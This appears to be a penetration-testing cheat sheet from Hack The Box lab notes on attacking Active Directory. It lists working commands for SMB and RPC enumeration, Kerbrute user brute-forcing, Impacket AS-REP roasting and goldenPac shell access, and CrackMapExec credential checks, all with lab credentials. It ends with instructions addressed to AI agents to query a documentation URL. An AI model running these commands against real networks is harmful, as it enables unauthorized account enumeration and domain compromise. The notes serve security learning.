# Active Directory

## smbclient

The smbclient utility is the Swiss Army knife of Linux-to-NT tools. This command lets you send messages to workstations, display browse lists and connect to SMB shares

```
smbmap -H 10.129.148.199
smbclient -N -L //10.129.148.199
smbmap -H 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'
```

## rpcclient

`rpcclient` is a tool for executing client side MS-RPC functions.

Anonymous login

```bash
rpcclient -U '' -N 10.129.148.19 # -N for no password -U for username
```

Login with credentials

```bash
$ rpcclient -U htb.local/james 10.129.148.199
Enter HTB.LOCAL\james's password: 
rpcclient $> enumdom
enumdomains    enumdomgroups  enumdomusers   
rpcclient $> enumdom
enumdomains    enumdomgroups  enumdomusers   
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[james] rid:[0x44f]
rpcclient $>
```

## Kerbrute

A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication

> <https://github.com/ropnop/kerbrute>

```bash
./kerbrute userenum --domain htb.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.52
```

## Impacket-Tools

> sudo apt install python3-impacket

To connect `mssql`&#x20;

```bash
impacket-mssqlclient 'admin:m$$ql_S@_P@ssW0rd!@10.129.148.199'
```

Dump a list of ASP-REP vulnerable users by credentials with `GetNPUsers`

```
impacket-GetNPUsers 'htb.local/james:J@m3s_P@ssW0rd!' -dc-ip 10.129.148.199
```

Getting a shell with generated kerbrute tickets. (Learn in HTB-Mantis)

```
impacket-goldenPac 'htb.local/james:J@m3s_P@ssW0rd!@mantis'
```

## Crackmapexec

> <https://github.com/byt3bl33d3r/CrackMapExec>
>
> Documentation: <https://mpgn.gitbook.io/crackmapexec/>

crackmpexec is a post-exploitation tool that helps automate assessing the security of *large* Active Directory networks.

Checking valid user for smb

```
crackmapexec smb 10.129.148.199 -u 'James' -p 'J@m3s_P@ssW0rd!' 
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://l33t-en0ugh.gitbook.io/infosec/active-directory.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.